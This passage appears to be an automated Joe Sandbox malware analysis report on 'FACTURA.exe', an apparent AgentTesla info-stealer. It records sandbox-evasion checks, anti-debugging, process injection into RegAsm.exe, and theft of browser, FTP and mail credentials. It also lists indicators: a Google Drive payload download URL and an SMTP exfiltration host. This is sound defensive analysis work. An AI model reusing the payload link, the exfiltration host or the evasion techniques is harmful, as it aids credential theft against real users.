            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\FACTURA.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: FACTURA.exe, 00000001.00000002.67798035599.0000000000760000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72340147408.0000000001180000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: FACTURA.exe, 00000001.00000002.67798035599.0000000000760000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGASM.EXE\SYSWOW64\MSVBVM60.DLL
            Source: FACTURA.exe, 00000001.00000002.67798258532.0000000000794000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: RegAsm.exe, 00000008.00000002.72340147408.0000000001180000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32USERPROFILE=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1Z97ZRUGHFIGX00IX8HM7VFHUS8AYDEWOWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
            Source: RegAsm.exe, 00000008.00000002.72340502392.0000000001228000.00000004.00000020.sdmpBinary or memory string: computer\userA\QEMU-GA.EXE
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5892Thread sleep time: -2767011611056431s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9956Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeSystem information queried: ModuleInformationJump to behavior
            Source: FACTURA.exe, 00000001.00000002.67800490129.0000000003299000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: FACTURA.exe, 00000001.00000002.67798035599.0000000000760000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe\syswow64\msvbvm60.dll
            Source: FACTURA.exe, 00000001.00000002.67800490129.0000000003299000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: FACTURA.exe, 00000001.00000002.67800490129.0000000003299000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: RegAsm.exe, 00000008.00000002.72341042354.00000000012A2000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWqD
            Source: FACTURA.exe, 00000001.00000002.67800490129.0000000003299000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: RegAsm.exe, 00000008.00000002.72340147408.0000000001180000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=https://drive.google.com/uc?export=download&id=1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWowininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
            Source: RegAsm.exe, 00000008.00000002.72340502392.0000000001228000.00000004.00000020.sdmpBinary or memory string: computer\usera\qemu-ga.exe
            Source: FACTURA.exe, 00000001.00000002.67800490129.0000000003299000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: RegAsm.exe, 00000008.00000002.72341042354.00000000012A2000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
            Source: FACTURA.exe, 00000001.00000002.67798035599.0000000000760000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72340147408.0000000001180000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: FACTURA.exe, 00000001.00000002.67800490129.0000000003299000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: FACTURA.exe, 00000001.00000002.67800490129.0000000003299000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: FACTURA.exe, 00000001.00000002.67798258532.0000000000794000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: FACTURA.exe, 00000001.00000002.67800490129.0000000003299000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: RegAsm.exe, 00000008.00000002.72342553896.0000000002C59000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\FACTURA.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread information set: HideFromDebuggerJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00E46946 KiUserExceptionDispatcher,LdrInitializeThunk,8_2_00E46946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\FACTURA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F00000Jump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe' Jump to behavior
            Source: C:\Users\user\Desktop\FACTURA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\FACTURA.exe' Jump to behavior
            Source: RegAsm.exe, 00000008.00000002.72342099395.0000000001800000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: RegAsm.exe, 00000008.00000002.72342099395.0000000001800000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: RegAsm.exe, 00000008.00000002.72342099395.0000000001800000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: RegAsm.exe, 00000008.00000002.72342099395.0000000001800000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7348, type: MEMORYSTR
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\Jump to behavior
            Tries to steal Mail credentials (via file access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: Yara matchFile source: 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7348, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7348, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation211DLL Side-Loading1Process Injection112Disable or Modify Tools1OS Credential Dumping2Security Software Discovery421Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion341Credentials in Registry1Process Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection112Security Account ManagerVirtualization/Sandbox Evasion341SMB/Windows Admin SharesData from Local System2Automated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol23Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery115VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538 Sample: FACTURA.exe Startdate: 06/10/2021 Architecture: WINDOWS Score: 100 19 mail.reyesyasociados.com 2->19 21 spclient.wg.spotify.com 2->21 23 4 other IPs or domains 2->23 31 Found malware configuration 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Sigma detected: RegAsm connects to smtp port 2->35 37 3 other signatures 2->37 8 FACTURA.exe 1 2->8         started        signatures3 process4 signatures5 39 Writes to foreign memory regions 8->39 41 Tries to detect Any.run 8->41 43 Hides threads from debuggers 8->43 11 RegAsm.exe 9 8->11         started        15 RegAsm.exe 8->15         started        process6 dnsIp7 25 mail.reyesyasociados.com 109.169.39.245, 49822, 587 IOMART-ASGB United Kingdom 11->25 27 googlehosted.l.googleusercontent.com 142.250.185.65, 443, 49789 GOOGLEUS United States 11->27 29 drive.google.com 172.217.18.110, 443, 49787 GOOGLEUS United States 11->29 45 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->45 47 Tries to steal Mail credentials (via file access) 11->47 49 Tries to harvest and steal ftp login credentials 11->49 55 3 other signatures 11->55 17 conhost.exe 11->17         started        51 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 15->51 53 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 15->53 signatures8 process9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            FACTURA.exe27%ReversingLabsWin32.Trojan.AgentTesla

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            mail.reyesyasociados.com2%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
            http://DynDns.comDynDNS0%Avira URL Cloudsafe
            https://sectigo.com/CPS00%VirustotalBrowse
            https://sectigo.com/CPS00%Avira URL Cloudsafe
            http://mail.reyesyasociados.com0%Avira URL Cloudsafe
            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%Avira URL Cloudsafe
            https://tCEASVGm7tT.org0%Avira URL Cloudsafe
            http://DXdVhu.com0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            172.217.18.110
            truefalse
              high
              googlehosted.l.googleusercontent.com
              142.250.185.65
              truefalse
                high
                edge-web.dual-gslb.spotify.com
                35.186.224.25
                truefalse
                  high
                  mail.reyesyasociados.com
                  109.169.39.245
                  truetrueunknown
                  spclient.wg.spotify.com
                  unknown
                  unknownfalse
                    high
                    doc-0o-88-docs.googleusercontent.com
                    unknown
                    unknownfalse
                      high

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://doc-0o-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/o2a761ub6bqdamuas6k5rune3dij162a/1633536225000/00014782062933200622/*/1Z97ZrughfIgx00iX8hM7vfhUS8AYDEWo?e=downloadfalse
                        high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://127.0.0.1:HTTP/1.1RegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://DynDns.comDynDNSRegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://sectigo.com/CPS0RegAsm.exe, 00000008.00000002.72352422895.000000001E0C8000.00000004.00000001.sdmpfalse
                        • 0%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        unknown
                        http://mail.reyesyasociados.comRegAsm.exe, 00000008.00000002.72352422895.000000001E0C8000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haRegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://drive.google.com/RegAsm.exe, 00000008.00000002.72340502392.0000000001228000.00000004.00000020.sdmpfalse
                          high
                          https://doc-0o-88-docs.googleusercontent.com/hRegAsm.exe, 00000008.00000002.72340793741.000000000126D000.00000004.00000020.sdmpfalse
                            high
                            https://tCEASVGm7tT.orgRegAsm.exe, 00000008.00000002.72352573428.000000001E0EC000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000003.68675247771.0000000001321000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://drive.google.com/nRegAsm.exe, 00000008.00000002.72340502392.0000000001228000.00000004.00000020.sdmpfalse
                              high
                              https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 00000008.00000002.72351571622.000000001E014000.00000004.00000001.sdmpfalse
                                high
                                http://DXdVhu.comRegAsm.exe, 00000008.00000002.72351172055.000000001DFC1000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://doc-0o-88-docs.googleusercontent.com/RegAsm.exe, 00000008.00000002.72340793741.000000000126D000.00000004.00000020.sdmpfalse
                                  high
                                  https://doc-0o-88-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/o2a761ubRegAsm.exe, 00000008.00000003.67771792759.00000000012B3000.00000004.00000001.sdmpfalse
                                    high

                                    Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public

                                    IPDomainCountryFlagASNASN NameMalicious
                                    109.169.39.245
                                    mail.reyesyasociados.comUnited Kingdom
                                    20860IOMART-ASGBtrue
                                    172.217.18.110
                                    drive.google.comUnited States
                                    15169GOOGLEUSfalse
                                    142.250.185.65
                                    googlehosted.l.googleusercontent.comUnited States
                                    15169GOOGLEUSfalse

                                    General Information

                                    Joe Sandbox Version:33.0.0 White Diamond
                                    Analysis ID:1538
                                    Start date:06.10.2021
                                    Start time:18:01:15
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 12m 49s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Sample file name:FACTURA.exe
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected Instruction Hammering
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
